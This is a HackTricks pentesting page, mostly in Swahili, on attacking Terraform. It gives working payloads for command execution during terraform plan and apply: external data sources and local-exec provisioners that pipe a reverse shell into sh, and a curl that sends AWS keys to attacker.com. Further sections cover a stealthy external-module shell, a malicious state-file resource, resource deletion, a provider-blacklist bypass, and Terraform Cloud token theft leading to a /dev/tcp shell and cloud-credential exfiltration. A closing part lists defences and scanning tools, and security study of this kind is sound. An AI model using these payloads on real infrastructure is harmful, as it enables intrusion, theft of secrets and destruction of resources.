Usalama wa Terraform

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

• Angalia mpango wa usajili!
• Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
• Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.

Taarifa za Msingi

From the docs:

HashiCorp Terraform ni chombo cha miundombinu kama msimbo (infrastructure as code tool) ambacho kinakuruhusu kufafanua rasilimali za cloud and on-prem resources katika faili za configuration zinazoweza kusomwa na binadamu ambazo unaweza kuweka version, kuzitumia tena, na kushiriki. Kisha unaweza kutumia mtiririko thabiti ku-provision na kusimamia miundombinu yako yote katika mzunguko wake wa maisha. Terraform inaweza kusimamia vipengele vya chini kama compute, storage, na networking resources, pamoja na vipengele vya ngazi ya juu kama DNS entries na SaaS features.

How does Terraform work?

Terraform huunda na kudhibiti rasilimali kwenye cloud platforms na huduma nyingine kupitia application programming interfaces (APIs) zao. Providers humruhusu Terraform kufanya kazi na karibu jukwaa au huduma yoyote yenye API inayopatikana.

HashiCorp na jamii ya Terraform tayari wameandika zaidi ya providers 1700 za kusimamia aina nyingi tofauti za rasilimali na huduma, na idadi hiyo inaendelea kukua. Unaweza kupata providers zote zinazopatikana hadharani kwenye Terraform Registry, ikiwa ni pamoja na Amazon Web Services (AWS), Azure, Google Cloud Platform (GCP), Kubernetes, Helm, GitHub, Splunk, DataDog, na zaidi.

Mtiririko mkuu wa kazi wa Terraform una hatua tatu:

• Write: Unafafanua rasilimali, ambazo zinaweza kuwa katika providers na huduma nyingi. Kwa mfano, unaweza kuunda configuration ku-deploy application kwenye virtual machines ndani ya Virtual Private Cloud (VPC) network yenye security groups na load balancer.
• Plan: Terraform huunda execution plan inayofafanua miundombinu itakayoundwa, kusasishwa, au kuharibiwa kulingana na miundombinu iliyopo na configuration yako.
• Apply: Baada ya idhini, Terraform hutekeleza operesheni zilizopendekezwa kwa mpangilio sahihi, ikiheshimu dependencies za rasilimali. Kwa mfano, ikiwa unasasisha mali za VPC na kubadilisha idadi ya virtual machines katika VPC hiyo, Terraform itarecreate VPC kabla ya kuongeza au kupunguza virtual machines.

Maabara ya Terraform

Just install terraform in your computer.

Here you have a guide and here you have the best way to download terraform.

RCE in Terraform: config file poisoning

Terraform doesn’t have a platform exposing a web page or a network service we can enumerate, therefore, the only way to compromise terraform is to be able to add/modify terraform configuration files or to be able to modify the terraform state file (see chapter below).

Hata hivyo, terraform ni kipengele nyeti sana kuingia kwa sababu itakuwa na privileged access kwa maeneo tofauti ili iweze kufanya kazi ipasavyo.

Njia kuu kwa mshambuliaji kuweza kudhoofisha mfumo ambapo terraform inaendesha ni kudhoofisha repository inayohifadhi terraform configurations, kwa sababu kwa wakati fulani zitatafsiriwa.

Kuna suluhisho ambazo hufanya terraform plan/apply kiotomatiki baada ya PR kuundwa, kama Atlantis:

Atlantis Security

Iwapo unaweza kudhoofisha faili ya terraform kuna njia tofauti unazoweza kupata RCE wakati mtu anatekeleza terraform plan au terraform apply.

Terraform plan

Terraform plan ni amri inayotumika zaidi katika terraform na developers/solutions zinazotumia terraform huipigia kila mara, hivyo njia rahisi ya kupata RCE ni kuhakikisha unapoison faili ya config ya terraform itakayotekeleza amri za kibinafsi katika terraform plan.

Using an external provider

Terraform offers the external provider which provides a way to interface between Terraform and external programs. You can use the external data source to run arbitrary code during a plan.

Kuingiza katika terraform config file kitu kama kifuatacho kutaendesha rev shell wakati wa kutekeleza terraform plan:

data "external" "example" {
program = ["sh", "-c", "curl https://reverse-shell.sh/8.tcp.ngrok.io:12946 | sh"]
}

Kutumia mtoa huduma maalum

Mshambulizi anaweza kutuma custom provider kwenye Terraform Registry na kisha kuiongeza kwenye code ya Terraform katika feature branch (example from here):

terraform {
required_providers {
evil = {
source  = "evil/evil"
version = "1.0"
}
}
}

provider "evil" {}

provider inapakuliwa wakati wa init na itaendesha msimbo hatarishi wakati plan itakapotekelezwa

Unaweza kupata mfano katika https://github.com/rung/terraform-provider-cmdexec

Kutumia rejea ya nje

Chaguzi zote mbili zilizotajwa ni muhimu lakini si za siri sana (ya pili ni ya siri zaidi lakini ni ngumu zaidi kuliko ya kwanza). Unaweza kufanya shambulizi hili kwa njia inayokuwa siri zaidi, kwa kufuata mapendekezo haya:

• Badala ya kuongeza rev shell moja kwa moja ndani ya faili ya terraform, unaweza kupakia rasilimali ya nje inayobeba rev shell:

module "not_rev_shell" {
source = "git@github.com:carlospolop/terraform_external_module_rev_shell//modules"
}

Unaweza kupata rev shell code in https://github.com/carlospolop/terraform_external_module_rev_shell/tree/main/modules

• Katika rasilimali ya nje, tumia kipengele cha ref kuficha terraform rev shell code in a branch ndani ya repo, kitu kama: git@github.com:carlospolop/terraform_external_module_rev_shell//modules?ref=b401d2b

Terraform Apply

Terraform apply itatekelezwa kutekeleza mabadiliko yote, unaweza pia kuitumia vibaya kupata RCE kwa kuingiza a malicious Terraform file with local-exec.
Unahitaji tu kuhakikisha kwamba payload kama zifuatazo inamalizika kwenye faili ya main.tf:

// Payload 1 to just steal a secret
resource "null_resource" "secret_stealer" {
provisioner "local-exec" {
command = "curl https://attacker.com?access_key=$AWS_ACCESS_KEY&secret=$AWS_SECRET_KEY"
}
}

// Payload 2 to get a rev shell
resource "null_resource" "rev_shell" {
provisioner "local-exec" {
command = "sh -c 'curl https://reverse-shell.sh/8.tcp.ngrok.io:12946 | sh'"
}
}

Fuata mapendekezo kutoka kwa tekniki iliyotangulia ili kutekeleza shambulio hili kwa njia ya kuficha zaidi kwa kutumia marejeleo ya nje.

Uondoaji wa Siri

Unaweza kuwa na maadili ya siri yanayotumika na terraform yatolewe kwa kuendesha terraform apply kwa kuongeza kwenye faili ya terraform kitu kama:

output "dotoken" {
value = nonsensitive(var.do_token)
}

Kutumia Vibaya Faili za State za Terraform

Ikiwa una ruhusa ya kuandika kwenye terraform state files lakini huwezi kubadilisha msimbo wa terraform, this research inatoa chaguzi za kuvutia za kutumia faili hiyo. Hata ikiwa ungetokuwa na ruhusa ya kuandika kwenye faili za config, kutumia njia ya state files mara nyingi ni ya ujanja zaidi, kwa kuwa hauachi alama katika historia ya git.

RCE in Terraform: config file poisoning

Inawezekana create a custom provider kisha kubadilisha mmoja wa providers katika terraform state file na kumwekea ile mbaya au kuongeza fake resource inayorejea provider mbaya.

Provider statefile-rce inaendeleza utafiti huo na inatumia kanuni hii kama silaha. Unaweza kuongeza resource bandia na kuweka amri yoyote ya bash unayotaka kukimbiza katika attribute command. Wakati terraform run itakapozinduliwa, hii itasomwa na kutekelezwa katika hatua za terraform plan na terraform apply. Katika hatua ya terraform apply, terraform itafuta resource bandia kutoka kwa state file baada ya kutekeleza amri yako, ikisafisha baada yake. Maelezo zaidi na demo kamili yanapatikana kwenye GitHub repository hosting the source code for this provider.

Ili kuitumia moja kwa moja, weka yafuatayo mahali popote ndani ya array ya resources na ubadilishe attributes za name na command:

{
"mode": "managed",
"type": "rce",
"name": "<arbitrary_name>",
"provider": "provider[\"registry.terraform.io/offensive-actions/statefile-rce\"]",
"instances": [
{
"schema_version": 0,
"attributes": {
"command": "<arbitrary_command>",
"id": "rce"
},
"sensitive_attributes": [],
"private": "bnVsbA=="
}
]
}

Kisha, mara tu terraform itakapotekelezwa, msimbo wako utaendeshwa.

Kufuta rasilimali

Kuna njia 2 za kufuta rasilimali:

1. Ingiza resource yenye jina la nasibu katika state file ikielekeza kwa resource halisi ya kufuta

Kwa sababu terraform itaona kwamba resource haipaswi kuwepo, itaiharibu (ikifuata resource ID halisi iliyoashiriwa). Mfano kutoka ukurasa uliopita:

{
"mode": "managed",
"type": "aws_instance",
"name": "example",
"provider": "provider[\"registry.terraform.io/hashicorp/aws\"]",
"instances": [
{
"attributes": {
"id": "i-1234567890abcdefg"
}
}
]
},

2. Badilisha rasilimali ili ifutwe kwa njia ambayo haiwezekani kusasisha (hivyo itafutwa na kuundwa upya)

Kwa EC2 instance, kubadilisha aina ya instance inatosha kufanya terraform ifute na kuiunda upya.

Badilisha provider aliyekuwekwa kwenye blacklist

Ikiwa utakutana na hali ambapo hashicorp/external imewekwa kwenye blacklist, unaweza kutekeleza tena provider ya external kwa kufanya yafuatayo. Kumbuka: Tunatumia fork ya external provider iliyochapishwa na https://registry.terraform.io/providers/nazarewk/external/latest. Unaweza kuchapisha fork yako mwenyewe au utekelezaji upya pia.

terraform {
required_providers {
external = {
source  = "nazarewk/external"
version = "3.0.0"
}
}
}

Kisha unaweza kutumia external kama kawaida.

data "external" "example" {
program = ["sh", "-c", "whoami"]
}

Terraform Cloud speculative plan RCE and credential exfiltration

Mfano huu unatumia vibaya Terraform Cloud (TFC) runners wakati wa speculative plans ili kuhamia kwenye target cloud account.

• Preconditions:

• Uiba token ya Terraform Cloud kutoka kwenye kompyuta ya msanidi programu. CLI inahifadhi tokeni kwa maandishi wazi kwenye ~/.terraform.d/credentials.tfrc.json.

• Token lazima iwe na ufikiaji kwa target organization/workspace na angalau ruhusa ya plan. VCS-backed workspaces zinazuia apply kutoka CLI, lakini bado zinaruhusu speculative plans.

• Gundua mipangilio ya workspace na VCS kupitia TFC API:

export TF_TOKEN=<stolen_token>
curl -s -H "Authorization: Bearer $TF_TOKEN" \
https://app.terraform.io/api/v2/organizations/<org>/workspaces/<workspace> | jq

• Sababisha utekelezaji wa msimbo wakati wa speculative plan kwa kutumia external data source na Terraform Cloud “cloud” block ili kulenga VCS-backed workspace:

terraform {
cloud {
organization = "acmecorp"
workspaces { name = "gcp-infra-prod" }
}
}

data "external" "exec" {
program = ["bash", "./rsync.sh"]
}

Mfano rsync.sh ili kupata reverse shell kwenye TFC runner:

#!/usr/bin/env bash
bash -c 'exec bash -i >& /dev/tcp/attacker.com/19863 0>&1'

Endesha mpango wa majaribio ili kutekeleza programu kwenye runner wa muda mfupi:

terraform init
terraform plan

• Enumerate and exfiltrate injected cloud credentials kutoka kwenye runner. Wakati wa runs, TFC injects provider credentials via files na environment variables:

env | grep -i gcp || true
env | grep -i aws || true

Faili zinazotarajiwa kwenye saraka ya kazi ya runner:

• GCP:

• tfc-google-application-credentials (Workload Identity Federation usanidi wa JSON)

• tfc-gcp-token (token ya ufikiaji ya GCP ya muda mfupi)

• AWS:

• tfc-aws-shared-config (usanidi wa web identity/OIDC wa kuchukua role)

• tfc-aws-token (token ya muda mfupi; baadhi ya mashirika yanaweza kutumia funguo za kudumu)

• Tumia vitambulisho vya muda mfupi out-of-band ili kuzunguka VCS gates:

GCP (gcloud):

export GOOGLE_APPLICATION_CREDENTIALS=./tfc-google-application-credentials
gcloud auth login --cred-file="$GOOGLE_APPLICATION_CREDENTIALS"
gcloud config set project <PROJECT_ID>

AWS (AWS CLI):

export AWS_CONFIG_FILE=./tfc-aws-shared-config
export AWS_PROFILE=default
aws sts get-caller-identity

Kwa kredenshiali hizi, wamdukuzi wanaweza kuunda/badilisha/kuharibu rasilimali moja kwa moja kwa kutumia CLIs za asili, wakiepuka mitiririko ya kazi inayotegemea PR ambayo inazuia apply kupitia VCS.

• Mwongozo wa ulinzi:
• Tumia kanuni ya least privilege kwa watumiaji/teama za TFC na tokens. Kagua uanachama na epuka wamiliki wenye mamlaka kupita kiasi.
• Zuia ruhusa ya plan kwenye workspaces nyeti zinazotegemea VCS pale inapowezekana.
• Lazuimishe allowlists za provider/data source kwa sera za Sentinel ili kuzuia data "external" au providers zisizojulikana. Angalia HashiCorp guidance kuhusu provider filtering.
• Pendelea OIDC/WIF badala ya static cloud credentials; tazama runners kama nyeti. Monitor speculative plan runs na unexpected egress.
• Gundua exfiltration ya artifact za kredenshiali tfc-* na toa onyo juu ya matumizi ya program ya external yenye shaka wakati wa plans.

Kuvuruga Terraform Cloud

Kutumia token

Kama explained in this post, terraform CLI inahifadhi tokens kwa plaintext katika ~/.terraform.d/credentials.tfrc.json. Kuiba token hii kunaruhusu mdukuzi kujifanya mtumiaji ndani ya wigo wa token.

Kwa kutumia tokeni hii inawezekana kupata org/workspace na:

GET https://app.terraform.io/api/v2/organizations/acmecorp/workspaces/gcp-infra-prod
Authorization: Bearer <TF_TOKEN>

Kisha inawezekana kuendesha msimbo wowote kwa kutumia terraform plan kama ilivyoelezwa katika sura iliyotangulia.

Kutoroka kwa cloud

Kisha, kama runner iko katika mazingira ya cloud, inawezekana kupata token ya principal iliyounganishwa na runner na kuitumia nje ya mzunguko.

• GCP files (zipo katika saraka ya kazi ya run ya sasa)

• tfc-google-application-credentials — JSON ya usanidi kwa Workload Identity Federation (WIF) inayomwambia Google jinsi ya kubadilishana utambulisho wa nje.

• tfc-gcp-token — GCP access token ya muda mfupi (≈1 hour) inayotajwa hapo juu

• AWS files

• tfc-aws-shared-config — JSON kwa web identity federation/OIDC role assumption (inayopendekezwa kuliko static keys).

• tfc-aws-token — token ya muda mfupi, au labda static IAM keys ikiwa zimepangwa vibaya.

Zana za Ukaguzi Otomatiki

Snyk Infrastructure as Code (IaC)

Snyk inatoa suluhisho kamili la ukaguzi wa Infrastructure as Code (IaC) linalotambua udhaifu na mipangilio isiyo sahihi katika Terraform, CloudFormation, Kubernetes, na fomati nyingine za IaC.

• Vipengele:
• Ukaguzi wa wakati halisi kwa ajili ya udhaifu wa usalama na masuala ya ufuataji.
• Uunganishaji na version control systems (GitHub, GitLab, Bitbucket).
• Automated fix pull requests.
• Ushauri wa kina wa kurekebisha.
• Jisajili: Unda akaunti kwenye Snyk.

brew tap snyk/tap
brew install snyk
snyk auth
snyk iac test /path/to/terraform/code

Checkov

Checkov ni chombo cha uchambuzi wa nambari cha static kwa ajili ya infrastructure as code (IaC) na pia chombo cha software composition analysis (SCA) kwa images na vifurushi vya chanzo wazi.

Inachunguza miundombinu ya cloud iliyotengenezwa kwa kutumia Terraform, Terraform plan, Cloudformation, AWS SAM, Kubernetes, Helm charts, Kustomize, Dockerfile, Serverless, Bicep, OpenAPI, ARM Templates, au OpenTofu na hutambua mipangilio mibaya ya usalama na uzingatiaji kwa kutumia uchunguzi unaotegemea grafu.

Hufanya Software Composition Analysis (SCA) scanning ambayo ni uchunguzi wa vifurushi vya chanzo wazi na images kwa Common Vulnerabilities and Exposures (CVEs).

pip install checkov
checkov -d /path/to/folder

terraform-compliance

Kutoka kwenye docs: terraform-compliance ni fremu ya mtihani nyepesi iliyolengwa kwenye usalama na ufuataji wa viwango dhidi ya terraform ili kuwezesha uwezo wa upimaji hasi kwa infrastructure-as-code yako.

• Uzingatiaji: Hakikisha msimbo uliotekelezwa unafuata viwango vya usalama na viwango vyako vya desturi
• Maendeleo yaliyoendeshwa na tabia: Tuna BDD kwa karibu kila kitu, kwanini si kwa IaC ?
• Inabebeka: sakinisha tu kutoka pip au iendeshe kupitia docker. See Installation
• Kabla ya deployment: inathibitisha msimbo wako kabla haujatekelezwa
• Rahisi kuunganisha: inaweza kuendeshwa katika pipeline yako (au katika git hooks) kuhakikisha deployments zote zinathibitishwa.
• Ugawanyo wa majukumu: unaweza kuweka majaribio yako katika repository tofauti ambapo timu tofauti itawajibika.

Note

Kwa bahati mbaya ikiwa msimbo unatumia providers fulani ambazo huna ufikiaji wa hutaweza kufanya the terraform plan na kuendesha zana hii.

pip install terraform-compliance
terraform plan -out=plan.out
terraform-compliance -f /path/to/folder

tfsec

From the docs: tfsec hutumia static analysis ya terraform code yako kubaini potential misconfigurations.

• ☁️ Hupima misconfigurations kwenye watoaji wote wakuu (na baadhi wadogo) wa cloud
• ⛔ Mamia ya kanuni zilizojengwa ndani
• 🪆 Inakagua modules (lokali na za mbali)
• ➕ Inatathmini HCL expressions pamoja na literal values
• ↪️ Inatathmini Terraform functions e.g. concat()
• 🔗 Inatathmini uhusiano kati ya Terraform resources
• 🧰 Inalingana na Terraform CDK
• 🙅 Inatumia (na kuboresha) sera za Rego zilizobainishwa na mtumiaji
• 📃 Inaunga mkono multiple output formats: lovely (default), JSON, SARIF, CSV, CheckStyle, JUnit, text, Gif.
• 🛠️ Inaweza kusanidiwa (kupitia CLI flags na/au config file)
• ⚡ Haraka sana, inaweza kukagua haraka hifadhi kubwa za miradi

brew install tfsec
tfsec /path/to/folder

terrascan

Terrascan ni static code analyzer kwa Infrastructure as Code. Terrascan inakuwezesha:

• Skana bila mshono Infrastructure as Code kutafuta misconfigurations.
• Fuatilia provisioned cloud infrastructure kwa mabadiliko ya configuration yanayoweza kuleta posture drift, na kutoa uwezo wa kurudisha posture salama.
• Tambua security vulnerabilities na compliance violations.
• Punguza hatari kabla ya provisioning cloud native infrastructure.
• Inatoa kubadilika kuendesha locally au kuunganishwa na CI\CD yako.

brew install terrascan
terrascan scan -d /path/to/folder

KICKS

Gundua udhaifu wa usalama, masuala ya utii, na misanidi potofu ya infrastructure-as-code mapema katika mzunguko wa maendeleo wa mradi wako kwa kutumia KICS ya Checkmarx.

KICS stands for Keeping Infrastructure as Code Secure; ni chanzo wazi na ni muhimu kwa mradi wowote wa cloud native.

docker run -t -v $(pwd):/path checkmarx/kics:latest scan -p /path -o "/path/"

Terrascan

From the docs: Terrascan ni mchambuzi wa msimbo tuli kwa ajili ya Infrastructure as Code. Terrascan inakuwezesha:

• Skana Infrastructure as Code kwa urahisi kutafuta mipangilio isiyo sahihi.
• Fuatilia miundombinu ya cloud iliyowekwa kwa mabadiliko ya usanidi yanayosababisha posture drift, na kuwezesha kurudi kwenye hali salama.
• Gundua udhaifu wa usalama na ukiukaji wa vigezo vya compliance.
• Punguza hatari kabla ya kutayarisha miundombinu ya cloud-native.
• Inatoa unyumbufu wa kuendesha lokali au kuungana na CI\CD yako.

brew install terrascan

Marejeo

• Atlantis Security
• https://alex.kaskaso.li/post/terraform-plan-rce
• https://developer.hashicorp.com/terraform/intro
• https://blog.plerion.com/hacking-terraform-state-privilege-escalation/
• https://github.com/offensive-actions/terraform-provider-statefile-rce
• Terraform Cloud token abuse turns speculative plan into remote code execution
• Terraform Cloud permissions
• Terraform Cloud API – Show workspace
• AWS provider configuration
• AWS CLI – OIDC role assumption
• GCP provider – Using Terraform Cloud
• Terraform – Sensitive variables
• Snyk Labs – Gitflops: dangers of Terraform automation platforms

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

• Angalia mpango wa usajili!
• Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
• Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.